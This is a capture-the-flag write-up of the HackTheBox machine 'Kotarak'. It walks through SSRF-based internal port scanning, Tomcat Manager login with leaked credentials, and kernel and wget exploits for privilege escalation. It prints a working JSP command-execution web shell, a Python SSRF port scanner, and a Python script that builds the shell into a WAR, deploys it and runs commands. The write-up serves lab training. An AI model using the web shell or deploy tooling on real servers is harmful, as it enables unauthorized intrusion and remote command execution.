Kotarak

Swagat
5 min readOct 15, 2021

HackTheBox retired box

Initial Foothold

We started our recon with nmapAutomator, which showed some of the open ports.

The full scan showed port 60000 open with a custom web app on it.

The site says it is a web hosting service and has an input box asking for a URL.
We entered the URL of our own listener to test for SSRF.

On checking my listener I saw a request coming from the target.

Now that we have SSRF, there are a few ways to turn it into RCE, but they depend on which services the box runs on localhost. If port 6379 (Redis) is open we can use the gopher:// protocol to exploit it: gopher lets the SSRF send arbitrary bytes to a TCP port, which is enough to issue Redis commands (for example to write a crontab or an SSH key).

So we quickly ran ffuf through the SSRF to find the open internal ports.

Note: this internal port scan can be done in various ways; the easiest is Burp Intruder. Since I was doing this on a test machine without Burp Pro I didn't use it, as the Community Edition Intruder is rate-limited and very slow.
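The scan logic in a small script, as an added example rather than the ffuf command used on the box. A blind SSRF scanner cannot see the remote banner, so it works on differences: a closed port returns the app's fixed error page, an open one returns the proxied response (different status or length) or hangs. The request format (GET /url.php?path=<url>) and the target address are assumptions; adapt them to what the real form sends.

```python
"""Internal port discovery through an SSRF endpoint by diffing responses
against a known-closed baseline port. Added example, not part of the
original writeup. TARGET and PARAM are assumptions."""
import urllib.error
import urllib.parse
import urllib.request

TARGET = "http://10.10.10.55:60000/url.php"   # assumption
PARAM = "path"                                  # assumption


def http_fetch(port, host="127.0.0.1", timeout=5):
    """Ask the SSRF endpoint to fetch http://host:port/ and return
    (status, body length). HTTP error pages count as responses too."""
    inner = "http://%s:%d/" % (host, port)
    url = TARGET + "?" + urllib.parse.urlencode({PARAM: inner})
    try:
        with urllib.request.urlopen(url, timeout=timeout) as r:
            return r.status, len(r.read())
    except urllib.error.HTTPError as e:
        return e.code, len(e.read())


def classify(fetch, ports, baseline_port=1):
    """Return [(port, reason)] for every port whose response differs from
    the baseline. `fetch` is injectable so the logic can be tested offline.
    A timeout means something accepted the TCP connection but did not speak
    HTTP (e.g. Redis or SSH), which is still an open port worth a look."""
    baseline = fetch(baseline_port)
    found = []
    for p in ports:
        try:
            resp = fetch(p)
        except Exception:
            found.append((p, "timeout"))
            continue
        if resp != baseline:
            found.append((p, "status=%d len=%d" % resp))
    return found


if __name__ == "__main__":
    for port, why in classify(http_fetch, range(1, 65536)):
        print(port, why)
```

Pick the baseline port by hand (one you are sure is closed) and, if the app's error page embeds the requested URL, compare lengths after normalising for that, or the port number itself will make every response look different.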

Meanwhile we ran ffuf against port 8080 to see if we could find anything, and found /manager/ (the Tomcat Manager) there.

If we can get the credentials somehow we can deploy a malicious WAR file, which gives us a shell directly. So what we need is either exposed credentials (through an information disclosure) or a local file inclusion with which we can read tomcat-users.xml.

Looking at the nmap results, port 8009 is open and runs the Apache JServ Protocol (AJP). It is vulnerable to Ghostcat (CVE-2020-1938), which is essentially a file read bug: an unauthenticated client can read files from inside the web application directory, and it can be escalated to a shell if the target also has an upload function (upload a JSP, then include it through AJP).

The tool above can be used to exploit Ghostcat directly.

Unfortunately this is not useful to us: Ghostcat can only read files under the web application root (WEB-INF/web.xml, for example), not arbitrary files, and tomcat-users.xml lives in conf/ outside that root.

So back to the internal port scan.

Several ports are open. We visited them one by one but found none of them useful except port 888.

This port has directory listing enabled and holds a directory called backup, which gave us a username and password. We tried them on /manager/html/ and got in.

We then used a simple JSP to execute commands on the machine.

    <FORM METHOD=GET ACTION='index.jsp'>
      <INPUT name='cmd' type=text>
      <INPUT type=submit value='Run'>
    </FORM>
    <%@ page import="java.io.*" %>
    <%
      // Read the command from the query string and run it; stdout is collected line by line.
      String cmd = request.getParameter("cmd");
      String output = "";
      if (cmd != null) {
        String s = null;
        try {
          Process p = Runtime.getRuntime().exec(cmd, null, null);
          BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));
          while ((s = sI.readLine()) != null) {
            output += s + "<br>";
          }
        } catch (IOException e) {
          e.printStackTrace();
        }
      }
    %>
    <pre><%= output %></pre>

Then I created a WAR file (a WAR is just a zip with the JSP at its root):

mkdir webshell

cp index.jsp webshell/

cd webshell

jar -cvf ../webshell.war *

Once the WAR file was ready I deployed it through the manager and browsed to it.

Using this I got a shell.
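The same packaging and deployment done from a script, as an added example and not the writeup's own commands: it builds the WAR with zipfile instead of jar, deploys it through the Tomcat Manager text interface, and runs a command through the shell. The target, credentials and context path are assumptions.

```python
"""Package index.jsp into a WAR, deploy it via /manager/text/deploy and
run a command through the resulting shell. Added example, not part of the
original writeup. TARGET, CREDS and CONTEXT are assumptions."""
import base64
import io
import urllib.parse
import urllib.request
import zipfile

TARGET = "http://10.10.10.55:8080"   # assumption
CREDS = ("admin", "password")        # assumption: whatever /backup on port 888 disclosed
CONTEXT = "/webshell"                # assumption


def build_war(jsp_source, name="index.jsp"):
    """Return the bytes of a WAR that contains one JSP at the archive root.
    No web.xml is needed; Tomcat compiles the JSP on first request."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr(name, jsp_source)
    return buf.getvalue()


def war_entries(war):
    """List the archive members, handy for checking the JSP is at the root."""
    return sorted(zipfile.ZipFile(io.BytesIO(war)).namelist())


def basic_auth_header():
    return "Basic " + base64.b64encode(("%s:%s" % CREDS).encode()).decode()


def deploy(war, context=CONTEXT):
    """PUT the WAR to the manager text interface. Tomcat answers
    'OK - Deployed application at context path ...' on success."""
    query = urllib.parse.urlencode({"path": context, "update": "true"})
    req = urllib.request.Request(
        TARGET + "/manager/text/deploy?" + query,
        data=war, method="PUT",
        headers={"Authorization": basic_auth_header(),
                 "Content-Type": "application/octet-stream"})
    with urllib.request.urlopen(req, timeout=15) as r:
        return r.read().decode(errors="replace")


def run(cmd, context=CONTEXT):
    """Hit the deployed index.jsp with ?cmd=... and return the page body."""
    query = urllib.parse.urlencode({"cmd": cmd})
    with urllib.request.urlopen(TARGET + context + "/index.jsp?" + query, timeout=15) as r:
        return r.read().decode(errors="replace")


if __name__ == "__main__":
    with open("index.jsp", "rb") as f:
        war = build_war(f.read())
    print(deploy(war))
    print(run("id"))
```

One caveat: /manager/text/ requires the manager-script role, while the HTML manager used in the writeup requires manager-gui. If the recovered account only has manager-gui, the text deploy returns 403 and you have to upload through the HTML form instead (which also needs the CSRF nonce from the page).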

Priv ESC

Once in, I ran linpeas looking for easy wins but found none. As this box is four or five years old there is a good chance of a kernel exploit, and linpeas also flagged the kernel version as vulnerable.

So I ran linux-exploit-suggester.sh and downloaded the eBPF_verifier exploit (CVE-2017-16995). After compiling and running it I got root.

But even with root we didn't get the root flag. There is a file in /root called app.log which shows the IP 10.0.1.33 requesting a file called .archive.tar.gz using wget 1.16.

A little googling on wget 1.16 revealed that it is vulnerable to an arbitrary file upload (CVE-2016-4971): when wget follows an HTTP redirect to an FTP URL it saves the file under the name the server supplies, so a malicious server can drop a .wgetrc into the requesting user's home directory and control what later wget runs do.

We followed the PoC below to get root.txt from 10.0.1.33.

Thanks For Reading

Happy Hacking

You can connect with me on

linkedin: https://www.linkedin.com/in/swagatkumar/

Swagat

A curious person working as a full-time Security Engineer